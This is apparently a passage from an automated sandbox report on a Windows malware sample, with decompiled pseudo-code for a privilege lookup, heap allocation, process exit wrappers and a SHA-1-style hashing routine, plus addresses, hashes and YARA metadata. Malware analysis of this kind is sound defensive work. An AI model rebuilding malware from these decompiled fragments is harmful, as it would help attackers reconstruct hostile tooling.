					__ecx =  *((intOrPtr*)(__esi + 0x300));
					__edi = _a4;
					__eax = E01207280(__ebx, __edi, __eflags, __edi,  *((intOrPtr*)(__esi + 0x300))); // executed
					__eax = E012199C0(__ecx);
					_t13 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
					__ebx = __eax + _t13;
					_a16 = 0;
					while(1) {
						__eax = E0120D3C0(__edi, 0xfe363c80); // executed
						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
						__eax =  &_v688;
						__eax = E01218770(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
						 *(__esi + 0x2dc) = __eax;
						__eflags = __eax;
						if(__eax < 0) {
							break;
						}
						__eflags = _v656;
						if(_v656 == 0) {
							L12:
							__eax = _a16;
							__eax = _a16 + 1;
							_a16 = __eax;
							__eflags = __eax - 2;
							if(__eax < 2) {
								continue;
							} else {
								__ebx = _v8;
								goto L16;
							}
						} else {
							__eflags = _v668;
							if(_v668 == 0) {
								goto L12;
							} else {
								__eflags = _v136;
								if(_v136 == 0) {
									goto L12;
								} else {
									__eflags = _v132;
									if(_v132 != 0) {
										__eax = _a12;
										__edx =  &_v688;
										__ebx = 1;
										__eax = E0121A0C0(_a12,  &_v688, 0x2a8);
										L16:
										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
										__eax = E01218700(__edi,  *((intOrPtr*)(__esi + 0x2f4)));
										__eflags = __ebx;
										if(__ebx == 0) {
											break;
										} else {
											__edx = _v668;
											__eax = _a12;
											__ecx = _v136;
											 *(_a12 + 0x14) = _v668;
											__edx =  *(__esi + 0x2d0);
											_t33 = __esi + 0x2e8; // 0x2e8
											__eax = _t33;
											 *_t33 = _v136;
											__eax = _a12;
											_t35 = __esi + 0x314; // 0x314
											__ebx = _t35;
											__ecx = 0;
											__eax = _a12 + 0x220;
											 *__ebx = 0x18;
											 *((intOrPtr*)(__esi + 0x318)) = 0;
											 *((intOrPtr*)(__esi + 0x320)) = 0;
											 *((intOrPtr*)(__esi + 0x31c)) = 0;
											 *((intOrPtr*)(__esi + 0x324)) = 0;
											 *((intOrPtr*)(__esi + 0x328)) = 0;
											__eax = E01217F80(__edi, _a12 + 0x220,  *(__esi + 0x2d0), __ebx, _a12 + 0x220);
											__ecx = 0;
											 *(__esi + 0x2dc) = __eax;
											__eflags = __eax;
											if(__eax < 0) {
												break;
											} else {
												__edx = _v132;
												_t43 = __esi + 0x2e0; // 0x2e0
												__eax = _t43;
												 *((intOrPtr*)(__esi + 0x318)) = 0;
												 *((intOrPtr*)(__esi + 0x320)) = 0;
												 *((intOrPtr*)(__esi + 0x31c)) = 0;
												 *((intOrPtr*)(__esi + 0x324)) = 0;
												 *((intOrPtr*)(__esi + 0x328)) = 0;
												_a12 = _a12 + 0x224;
												 *(__esi + 0x2e4) = _v132;
												 *__ebx = 0x18;
												 *(__esi + 0x2d0) = 0x1a;
												__eax = E01217FC0(__edi, _a12 + 0x224, 0x1a, __ebx, _t43);
												 *(__esi + 0x2dc) = __eax;
												__eflags = __eax;
												if(__eax < 0) {
													break;
												} else {
													__edx = _a8;
													 *(__edx + 0x10) =  *(__edx + 0x10) + 0x200;
													__eflags =  *(__edx + 0x10) + 0x200;
													__eax = E01219660(__ecx);
													__ebx = __eax;
													__eax =  *(__ebx + 0x28);
													__eax = E0121A3B0(__ebx, __edi,  *(__ebx + 0x28));
													__edx =  *(__ebx + 0x28);
													_t58 = __eax + 2; // 0x2
													__ecx = __eax + _t58;
													__eax =  &_v656;
													__eax = E01213A40(__ecx, __esi, __edi,  &_v656, 2, 0); // executed
													_pop(__edi);
													_pop(__esi);
													_pop(__ebx);
													__esp = __ebp;
													_pop(__ebp);
													return __eax;
												}
											}
										}
									} else {
										goto L12;
									}
								}
							}
						}
						goto L20;
					}
					_pop(__edi);
					_pop(__esi);
					__eax = 0;
					__eflags = 0;
					_pop(__ebx);
					__esp = __ebp;
					_pop(__ebp);
					return 0;
				}
				L20:
			}

0x01207308
0x012072da
0x012072dc
0x012072de
0x012072fb
0x012072fb
0x01207302
0x0120730a
0x0120730a
0x0120730b
0x01207310
0x01207311
0x01207313
0x01207319
0x0120731a
0x0120731b
0x0120731c
0x01207324
0x01207327
0x01207334
0x01207339
0x0120733c
0x01207342
0x01207347
0x0120734f
0x0120735a
0x0120735a
0x01207361
0x01207370
0x01207376
0x0120737b
0x01207388
0x01207392
0x0120739a
0x012073a0
0x012073a2
0x00000000
0x00000000
0x012073a4
0x012073ac
0x012073c6
0x012073c6
0x012073c9
0x012073ca
0x012073cd
0x012073d0
0x00000000
0x012073d2
0x012073d2
0x00000000
0x012073d2
0x012073ae
0x012073ae
0x012073b5
0x00000000
0x012073b7
0x012073b7
0x012073be
0x00000000
0x012073c0
0x012073c0
0x012073c4
0x012073e0
0x012073e8
0x012073f0
0x012073f5
0x012073fd
0x012073fd
0x01207405
0x0120740d
0x0120740f
0x00000000
0x01207411
0x01207411
0x01207417
0x0120741a
0x01207420
0x01207423
0x01207429
0x01207429
0x01207430
0x01207432
0x01207435
0x01207435
0x0120743c
0x0120743f
0x01207446
0x0120744c
0x01207452
0x01207458
0x0120745e
0x01207464
0x0120746a
0x0120746f
0x01207474
0x0120747a
0x0120747c
0x00000000
0x01207482
0x01207482
0x01207485
0x01207485
0x0120748c
0x01207492
0x01207498
0x0120749e
0x012074a4
0x012074b0
0x012074b8
0x012074be
0x012074c4
0x012074ce
0x012074d6
0x012074dc
0x012074de
0x00000000
0x012074e4
0x012074e4
0x012074ea
0x012074ea
0x012074f0
0x012074fd
0x012074ff
0x01207503
0x01207508
0x0120750b
0x0120750b
0x0120751b
0x01207523
0x0120752b
0x0120752c
0x0120752d
0x0120752e
0x01207530
0x01207531
0x01207531
0x012074de
0x0120747c
0x00000000
0x00000000
0x00000000
0x012073c4
0x012073be
0x012073b5
0x00000000
0x012073ac
0x012073d7
0x012073d8
0x012073d9
0x012073d9
0x012073db
0x012073dc
0x012073de
0x012073df
0x012073df
0x00000000

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 012072DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 012072FB

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: b395cf0dedc4d85e79cbab5e7f39fde38229aaf53190158a1255ae2d59801d98
Instruction ID: dc1572d128f15c07ca1699abade5aa8103860d331b689ab69bbde6560731fad4
Opcode Fuzzy Hash: b395cf0dedc4d85e79cbab5e7f39fde38229aaf53190158a1255ae2d59801d98
Instruction Fuzzy Hash: 6CE086707D02192DEB1355445C03F7D3758A741B41F100166FF44DA1D2EAC5651646F2

Uniqueness

Uniqueness Score: -1.00%

Function 012188A0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E012188A0(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E012191D0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x012188b7
0x012188cd
0x012188d1

APIs

RtlAllocateHeap.NTDLL(01213526,?,01213C9F,01213C9F,?,01213526,?,?,?,?,?,00000000,00000000,?), ref: 012188CD

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: 98a522c2ff6d496021ec24828f4a518050ad5c43b6196a254b468204b3988366
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC44EA777ACEF88654F118558FE085B241C631F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 01218A40, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E01218A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E012191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x01218a5a
0x01218a70
0x01218a74

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0120CFB2,0120CFB2,?,00000000,?,?), ref: 01218A70

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: 10e1e68df1e15e3031f31365b9c330fc9c0734a585be64d1bb16cfaada32f199
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: E2E01AB12002086BDB14DF49CC84EE737ADAF88650F018154BE0857241C931E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 01218920, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01218920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E012191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x01218923
0x0121893a
0x01218948

APIs

ExitProcess.KERNEL32(?,00000000,0000000D,?,?,00000001), ref: 01218948

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: f61f892bcd576a338262d9cdc0deca15590d0aa494bc94732f5f058449060148
Instruction ID: 0c9534f67e3bdaee9ac323f94940944a9de57c2b3eb2b18e1b8aebd595a1fcd7
Opcode Fuzzy Hash: f61f892bcd576a338262d9cdc0deca15590d0aa494bc94732f5f058449060148
Instruction Fuzzy Hash: FED012716102187BD624DB98CC89FD7779CDF58690F018065BA1C5B241C571BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Function 01218913, Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E01218913(intOrPtr _a4, int _a8) {
				void* _t14;

				asm("sbb bl, [edi-0x1374aa8e]");
				_t9 = _a4;
				E012191D0(_t14, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x0121891d
0x01218923
0x0121893a
0x01218948

APIs

ExitProcess.KERNEL32(?,00000000,0000000D,?,?,00000001), ref: 01218948

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 2be7e0dfe17fd73dae7f4dcb9aa7e3327bbbf52d7bb0f6e4842158afd716e288
Instruction ID: 358bb437f57a32265e7aa4dcab791e6e9269a2becafdcb980e364d8c18bf8d33
Opcode Fuzzy Hash: 2be7e0dfe17fd73dae7f4dcb9aa7e3327bbbf52d7bb0f6e4842158afd716e288
Instruction Fuzzy Hash: 48E08C34201204ABE720DBA9CC98FD77BA8AF18380F148098B9489B641DA30EA00CBA0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01208C6C, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E01208C6C(void* __eax, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t279;
				signed int* _t280;
				signed int _t281;
				signed int _t287;
				signed int _t290;
				signed int _t294;
				signed int _t297;
				signed int _t301;
				signed int _t305;
				signed int _t307;
				signed int _t313;
				signed int _t321;
				signed int _t323;
				signed int _t326;
				signed int _t328;
				signed int _t337;
				signed int _t343;
				signed int _t344;
				signed int _t349;
				signed int _t357;
				signed int _t361;
				signed int _t362;
				signed int _t366;
				signed int _t369;
				signed int _t373;
				signed int _t374;
				signed int _t403;
				signed int _t408;
				signed int _t414;
				signed int _t417;
				signed int _t424;
				signed int _t427;
				signed int _t436;
				signed int _t438;
				signed int _t441;
				signed int _t449;
				signed int _t464;
				signed int _t467;
				signed int _t468;
				signed int _t469;
				signed int _t475;
				signed int _t483;
				signed int _t484;
				signed int* _t485;
				signed int* _t488;
				signed int _t495;
				signed int _t498;
				signed int _t503;
				signed int _t506;
				signed int _t509;
				signed int _t512;
				signed int _t513;
				signed int _t517;
				signed int _t529;
				signed int _t532;
				signed int _t539;
				void* _t545;
				void* _t547;

				_t545 = _t547;
				_t488 = _a4;
				_t357 = 0;
				_t2 =  &(_t488[7]); // 0x1b
				_t279 = _t2;
				do {
					 *(_t545 + _t357 * 4 - 0x14c) = ((( *(_t279 - 1) & 0x000000ff) << 0x00000008 |  *_t279 & 0x000000ff) << 0x00000008 | _t279[1] & 0x000000ff) << 0x00000008 | _t279[2] & 0x000000ff;
					 *(_t545 + _t357 * 4 - 0x148) = (((_t279[3] & 0x000000ff) << 0x00000008 | _t279[4] & 0x000000ff) << 0x00000008 | _t279[5] & 0x000000ff) << 0x00000008 | _t279[6] & 0x000000ff;
					 *(_t545 + _t357 * 4 - 0x144) = (((_t279[7] & 0x000000ff) << 0x00000008 | _t279[8] & 0x000000ff) << 0x00000008 | _t279[9] & 0x000000ff) << 0x00000008 | _t279[0xa] & 0x000000ff;
					 *(_t545 + _t357 * 4 - 0x140) = (((_t279[0xb] & 0x000000ff) << 0x00000008 | _t279[0xc] & 0x000000ff) << 0x00000008 | _t279[0xd] & 0x000000ff) << 0x00000008 | _t279[0xe] & 0x000000ff;
					_t357 = _t357 + 4;
					_t279 =  &(_t279[0x10]);
				} while (_t357 < 0x10);
				_t280 =  &_v304;
				_v8 = 0x10;
				do {
					_t403 =  *(_t280 - 0x18);
					_t464 =  *(_t280 - 0x14);
					_t361 =  *(_t280 - 0x20) ^ _t280[5] ^  *_t280 ^ _t403;
					asm("rol ecx, 1");
					asm("rol ebx, 1");
					_t280[9] =  *(_t280 - 0x1c) ^ _t280[6] ^ _t280[1] ^ _t464;
					_t280[8] = _t361;
					_t321 = _t280[7] ^  *(_t280 - 0x10) ^ _t280[2];
					_t280 =  &(_t280[4]);
					asm("rol ebx, 1");
					asm("rol edx, 1");
					_t46 =  &_v8;
					 *_t46 = _v8 - 1;
					_t280[6] = _t321 ^ _t403;
					_t280[7] =  *(_t280 - 0x1c) ^  *(_t280 - 4) ^ _t361 ^ _t464;
				} while ( *_t46 != 0);
				_t323 =  *_t488;
				_t281 = _t488[1];
				_t362 = _t488[2];
				_t408 = _t488[3];
				_v12 = _t323;
				_v16 = _t488[4];
				_v8 = 0;
				do {
					asm("rol ebx, 0x5");
					_t467 = _v8;
					_t495 = _t323 + ( !_t281 & _t408 | _t362 & _t281) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x14c)) + _v16 + 0x5a827999;
					_t326 = _v12;
					asm("ror eax, 0x2");
					_v16 = _t408;
					_v12 = _t495;
					asm("rol esi, 0x5");
					_v8 = _t362;
					_t414 = _t495 + ( !_t326 & _t362 | _t281 & _t326) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x148)) + _v16 + 0x5a827999;
					_t498 = _t281;
					asm("ror ebx, 0x2");
					_v16 = _v8;
					_t366 = _v12;
					_v8 = _t326;
					_t328 = _v8;
					_v12 = _t414;
					asm("rol edx, 0x5");
					_t287 = _t414 + ( !_t366 & _t498 | _t326 & _t366) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x144)) + _v16 + 0x5a827999;
					_t417 = _v12;
					_v16 = _t498;
					asm("ror ecx, 0x2");
					_v8 = _t366;
					_v12 = _t287;
					asm("rol eax, 0x5");
					_v16 = _t328;
					_t503 = _t287 + ( !_t417 & _t328 | _t366 & _t417) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x140)) + _v16 + 0x5a827999;
					_t362 = _v12;
					_t290 = _v8;
					asm("ror edx, 0x2");
					_v8 = _t417;
					_v12 = _t503;
					asm("rol esi, 0x5");
					_v16 = _t290;
					_t281 = _v12;
					_t506 = _t503 + ( !_t362 & _t290 | _t417 & _t362) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x13c)) + _v16 + 0x5a827999;
					_t408 = _v8;
					asm("ror ecx, 0x2");
					_t468 = _t467 + 5;
					_t323 = _t506;
					_v12 = _t323;
					_v8 = _t468;
				} while (_t468 < 0x14);
				_t469 = 0x14;
				do {
					asm("rol esi, 0x5");
					asm("ror eax, 0x2");
					_v16 = _t408;
					_t509 = _t506 + (_t408 ^ _t362 ^ _t281) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
					_t337 = _v12;
					_v12 = _t509;
					asm("rol esi, 0x5");
					_t424 = _t509 + (_t362 ^ _t281 ^ _t337) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
					asm("ror ebx, 0x2");
					_t512 = _t281;
					_v16 = _t362;
					_t369 = _v12;
					_v12 = _t424;
					asm("rol edx, 0x5");
					asm("ror ecx, 0x2");
					_t294 = _t424 + (_t281 ^ _t337 ^ _t369) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
					_t427 = _v12;
					_v8 = _t337;
					_v8 = _t369;
					_v12 = _t294;
					asm("rol eax, 0x5");
					_t469 = _t469 + 5;
					_t362 = _v12;
					asm("ror edx, 0x2");
					_t146 = _t512 + 0x6ed9eba1; // 0x6ed9eb9f
					_t513 = _t294 + (_t337 ^ _v8 ^ _t427) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x154)) + _t146;
					_t297 = _v8;
					_v8 = _t427;
					_v12 = _t513;
					asm("rol esi, 0x5");
					_t408 = _v8;
					_t506 = _t513 + (_t297 ^ _v8 ^ _t362) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x150)) + _t337 + 0x6ed9eba1;
					_v16 = _t297;
					_t281 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t506;
				} while (_t469 < 0x28);
				_v8 = 0x28;
				do {
					asm("rol esi, 0x5");
					_v16 = _t408;
					asm("ror eax, 0x2");
					_t517 = ((_t362 | _t281) & _t408 | _t362 & _t281) +  *((intOrPtr*)(_t545 + _v8 * 4 - 0x14c)) + _t506 + _v16 - 0x70e44324;
					_t475 = _v12;
					_v12 = _t517;
					asm("rol esi, 0x5");
					_t343 = _v8;
					asm("ror edi, 0x2");
					_t436 = ((_t281 | _t475) & _t362 | _t281 & _t475) +  *((intOrPtr*)(_t545 + _t343 * 4 - 0x148)) + _t517 + _v16 - 0x70e44324;
					_v16 = _t362;
					_t373 = _v12;
					_v12 = _t436;
					asm("rol edx, 0x5");
					_v8 = _t281;
					_t438 = ((_t475 | _t373) & _t281 | _t475 & _t373) +  *((intOrPtr*)(_t545 + _t343 * 4 - 0x144)) + _t436 + _v16 - 0x70e44324;
					asm("ror ecx, 0x2");
					_v16 = _v8;
					_t301 = _v12;
					_v8 = _t475;
					_v12 = _t438;
					asm("rol edx, 0x5");
					asm("ror eax, 0x2");
					_t529 = ((_t373 | _t301) & _t475 | _t373 & _t301) +  *((intOrPtr*)(_t545 + _t343 * 4 - 0x140)) + _t438 + _v16 - 0x70e44324;
					_v16 = _v8;
					_t441 = _t373;
					_t362 = _v12;
					_v8 = _t441;
					_v12 = _t529;
					asm("rol esi, 0x5");
					_v16 = _v8;
					_t506 = ((_t301 | _t362) & _t441 | _t301 & _t362) +  *((intOrPtr*)(_t545 + _t343 * 4 - 0x13c)) + _t529 + _v16 - 0x70e44324;
					_t408 = _t301;
					_t281 = _v12;
					asm("ror ecx, 0x2");
					_v12 = _t506;
					_t344 = _t343 + 5;
					_v8 = _t344;
				} while (_t344 < 0x3c);
				_t483 = 0x3c;
				_v8 = 0x3c;
				do {
					asm("rol esi, 0x5");
					_t484 = _v8;
					asm("ror eax, 0x2");
					_t532 = (_t408 ^ _t362 ^ _t281) +  *((intOrPtr*)(_t545 + _t483 * 4 - 0x14c)) + _t506 + _v16 - 0x359d3e2a;
					_t349 = _v12;
					_v16 = _t408;
					_v12 = _t532;
					asm("rol esi, 0x5");
					asm("ror ebx, 0x2");
					_t449 = (_t362 ^ _t281 ^ _t349) +  *((intOrPtr*)(_t545 + _t484 * 4 - 0x148)) + _t532 + _v16 - 0x359d3e2a;
					_v16 = _t362;
					_t374 = _v12;
					_v12 = _t449;
					asm("rol edx, 0x5");
					_v16 = _t281;
					asm("ror ecx, 0x2");
					_t305 = (_t281 ^ _t349 ^ _t374) +  *((intOrPtr*)(_t545 + _t484 * 4 - 0x144)) + _t449 + _v16 - 0x359d3e2a;
					_t408 = _v12;
					_v12 = _t305;
					asm("rol eax, 0x5");
					_v16 = _t349;
					_t539 = (_t349 ^ _t374 ^ _t408) +  *((intOrPtr*)(_t545 + _t484 * 4 - 0x140)) + _t305 + _v16 - 0x359d3e2a;
					_t307 = _t374;
					_v8 = _t349;
					asm("ror edx, 0x2");
					_v8 = _t374;
					_t362 = _v12;
					_v12 = _t539;
					asm("rol esi, 0x5");
					_t483 = _t484 + 5;
					_t506 = (_t307 ^ _t408 ^ _t362) +  *((intOrPtr*)(_t545 + _t484 * 4 - 0x13c)) + _t539 + _v16 - 0x359d3e2a;
					_v16 = _t307;
					_t281 = _v12;
					asm("ror ecx, 0x2");
					_v8 = _t408;
					_v12 = _t506;
					_v8 = _t483;
				} while (_t483 < 0x50);
				_t485 = _a4;
				_t485[2] = _t485[2] + _t362;
				_t485[3] = _t485[3] + _t408;
				_t313 = _t485[4] + _v16;
				 *_t485 =  *_t485 + _t506;
				_t485[1] = _t485[1] + _t281;
				_t485[4] = _t313;
				_t485[0x17] = 0;
				return _t313;
			}

0x01208c71
0x01208c7b
0x01208c7f
0x01208c81
0x01208c81
0x01208c84
0x01208ca6
0x01208ccc
0x01208cf2
0x01208d14
0x01208d1b
0x01208d1e
0x01208d21
0x01208d2a
0x01208d30
0x01208d37
0x01208d48
0x01208d4b
0x01208d4e
0x01208d52
0x01208d54
0x01208d56
0x01208d5f
0x01208d62
0x01208d65
0x01208d70
0x01208d76
0x01208d78
0x01208d78
0x01208d7b
0x01208d7e
0x01208d7e
0x01208d83
0x01208d85
0x01208d88
0x01208d8b
0x01208d91
0x01208d94
0x01208d97
0x01208da0
0x01208da6
0x01208daf
0x01208dbe
0x01208dc5
0x01208dc8
0x01208dcb
0x01208dd4
0x01208dd7
0x01208dda
0x01208df2
0x01208df9
0x01208dfb
0x01208dfe
0x01208e01
0x01208e0a
0x01208e11
0x01208e14
0x01208e17
0x01208e26
0x01208e2d
0x01208e30
0x01208e33
0x01208e3c
0x01208e46
0x01208e49
0x01208e55
0x01208e58
0x01208e5f
0x01208e62
0x01208e65
0x01208e6a
0x01208e6d
0x01208e76
0x01208e87
0x01208e8a
0x01208e8d
0x01208e94
0x01208e97
0x01208e9a
0x01208e9d
0x01208e9f
0x01208ea2
0x01208ea5
0x01208eae
0x01208eb3
0x01208eb3
0x01208ec8
0x01208ecb
0x01208ece
0x01208ed5
0x01208ed8
0x01208edb
0x01208ef0
0x01208ef7
0x01208efa
0x01208efe
0x01208f01
0x01208f06
0x01208f09
0x01208f18
0x01208f1b
0x01208f22
0x01208f25
0x01208f28
0x01208f2b
0x01208f2e
0x01208f36
0x01208f44
0x01208f47
0x01208f4a
0x01208f4a
0x01208f51
0x01208f54
0x01208f57
0x01208f5f
0x01208f6d
0x01208f70
0x01208f77
0x01208f7a
0x01208f7d
0x01208f80
0x01208f83
0x01208f8c
0x01208f93
0x01208f93
0x01208f99
0x01208fb2
0x01208fb5
0x01208fbc
0x01208fbf
0x01208fc2
0x01208fd4
0x01208fde
0x01208fe1
0x01208fea
0x01208fed
0x01208ff4
0x01208ff7
0x01208ffd
0x01209010
0x01209017
0x0120901a
0x0120901d
0x01209020
0x01209029
0x0120902c
0x0120903f
0x01209042
0x0120904c
0x0120904f
0x01209051
0x0120905a
0x0120905d
0x01209070
0x01209076
0x01209079
0x01209080
0x01209082
0x01209085
0x01209088
0x0120908b
0x0120908e
0x01209091
0x0120909a
0x0120909f
0x012090a2
0x012090a2
0x012090b5
0x012090b8
0x012090bb
0x012090c2
0x012090c5
0x012090c8
0x012090cb
0x012090de
0x012090e1
0x012090ec
0x012090ef
0x012090fb
0x012090fe
0x01209104
0x01209107
0x0120910a
0x01209111
0x01209121
0x01209124
0x0120912a
0x0120912d
0x01209134
0x01209136
0x01209139
0x0120913c
0x0120913f
0x01209142
0x01209149
0x01209158
0x0120915b
0x01209162
0x01209165
0x01209168
0x0120916b
0x0120916e
0x01209171
0x01209174
0x0120917d
0x0120918e
0x01209196
0x0120919c
0x0120919f
0x012091a1
0x012091a4
0x012091a7
0x012091b4

Strings

(, xrefs: 01208F8C

Memory Dump Source

Source File: 00000000.00000002.395880682.0000000001201000.00000040.00020000.sdmp, Offset: 01200000, based on PE: true

Associated: 00000000.00000002.395866827.0000000001200000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1200000_stage4.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 20f4b65ae852b0de0c61a76900c1cb445aad542b5ff88eaaed730a9b46f56e97
Instruction ID: 245e61afd89f56bac5b60d7466271a3a1b9385982e1c9c0342f445bd40520f94
Opcode Fuzzy Hash: 20f4b65ae852b0de0c61a76900c1cb445aad542b5ff88eaaed730a9b46f56e97
Instruction Fuzzy Hash: 51022DB6E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A7315D6746A418F80

Uniqueness

Uniqueness Score: -1.00%

Function 01208C70, Relevance: 1.7, Strings: 1, Instructions: 423
COMMONCrypto

Download Yara Rule

C-Code - Quality: 73%

			E01208C70(signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v304;
				signed char* _t277;
				signed int* _t278;
				signed int _t279;
				signed int _t285;
				signed int _t288;
				signed int _t292;
				signed int _t295;
				signed int _t299;
				signed int _t303;
				signed int _t305;
				signed int _t311;
				signed int _t318;
				signed int _t320;
				signed int _t323;
				signed int _t325;
				signed int _t334;
				signed int _t340;
				signed int _t341;
				signed int _t346;
				signed int _t353;
				signed int _t357;
				signed int _t358;
				signed int _t362;
				signed int _t365;
				signed int _t369;
				signed int _t370;
				signed int _t399;
				signed int _t404;
				signed int _t410;
				signed int _t413;
				signed int _t420;
				signed int _t423;
				signed int _t432;
				signed int _t434;
				signed int _t437;
				signed int _t445;
				signed int _t459;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t470;
				signed int _t478;
				signed int _t479;
				signed int* _t480;
				signed int* _t481;
				signed int _t488;
				signed int _t491;
				signed int _t496;
				signed int _t499;
				signed int _t502;
				signed int _t505;
				signed int _t506;
				signed int _t510;
				signed int _t522;
				signed int _t525;
				signed int _t532;
				void* _t536;

				_t481 = _a4;
				_t353 = 0;
				_t2 =  &(_t481[7]); // 0x1b
				_t277 = _t2;
				do {
					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
					_t353 = _t353 + 4;
					_t277 =  &(_t277[0x10]);
				} while (_t353 < 0x10);
				_t278 =  &_v304;
				_v8 = 0x10;
				do {
					_t399 =  *(_t278 - 0x18);
